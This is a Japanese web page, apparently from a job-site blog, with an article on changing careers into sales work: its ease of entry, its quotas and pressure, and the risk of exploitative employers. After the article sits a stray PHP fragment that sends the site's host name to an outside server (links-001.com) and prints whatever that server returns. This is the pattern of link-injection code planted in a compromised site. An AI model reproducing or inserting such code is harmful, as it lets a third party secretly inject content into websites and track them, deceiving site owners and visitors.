前へ
次へ

営業求人の転職はここがポイント

営業求人の転職はそれまで営業職の経験が無くても比較的採用されやすい環境です。
ただ採用する企業が即戦力

more

転職者にとって営業求人のチェックポイント

営業求人では、転職者歓迎などの謳い文句もありますが、給与から福利厚生、経営状態なども抜かりなくチェッ

more

運気を変える営業求人への転職

人生の分岐点はいくつもありますが、最も頭を悩ませるのが転職だと言われています。
誰もが給与を上げたいと

more

転職なら営業求人倍率の高さが魅力の営業職

ものやサービスを売る企業は、通常、営業と内勤に分かれています。
売り上げという企業の儲けの多くを営業が引き受け、他方、営業が稼いできたものを処理して企業の運用に活かしたり、給与に変えたり、その他必要な事務手付きを行うのが内勤の仕事です。
内勤の仕事はそれなりの専門性がある部署が多いため、特殊技能や専門的知識または経験がある人が優遇されやすい。
他方、営業は、当該企業が提供する製品や商品、サービスを顧客にすすめて利用してもらうというのが目的であるため、製品や商品あるいはサービスの知識があれば、あとは人柄とトークでなんとかなる場合が多いものです。
そこで、営業部門は、商品や製品、サービスを提供する企業ならばどの企業も持っています。
その点、営業求人倍率は高いのが一般です。
営業求人職の場合、特別な資格がいらないため、誰でも転職の対象にできる点も魅力です。
また、営業職は、自分の仕事の評価がお金の形であらわれてくるために、やりがいがある仕事でもあります。
反面、労働時間が長くなりがちで、ノルマがあるのが普通なので、プレッシャーに弱い人には向いていない。
会社から与えられたノルマを自分の目標に落とし込んで、それを一つ一つクリアすることでやりがいを感じられる人であれば、営業ほど楽しい仕事はないでしょう。
ところで、営業職には法人を対象にするものと個人を対象にするものとがあります。
前者の方が一般に大きな販売金額になるために給与も高くなる傾向があります。
もちろん生命保険のように、個人のお客を対象にしても長期間保険料が発生するような場合には、給与が高くなります。
営業職では注意したい点もあります。
それは、営業職の中にはブラック企業の求人も多いという点です。
転職にあたっては、当該企業がブラックかどうかをネット上などで確かめてから転職しても良いかどうかを判断することが大切です。
それに加えて、転職先の企業のものやサービスを事前に調べて、自分自身がそれらを好きになれるかどうかを確認しておくことも大切です。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top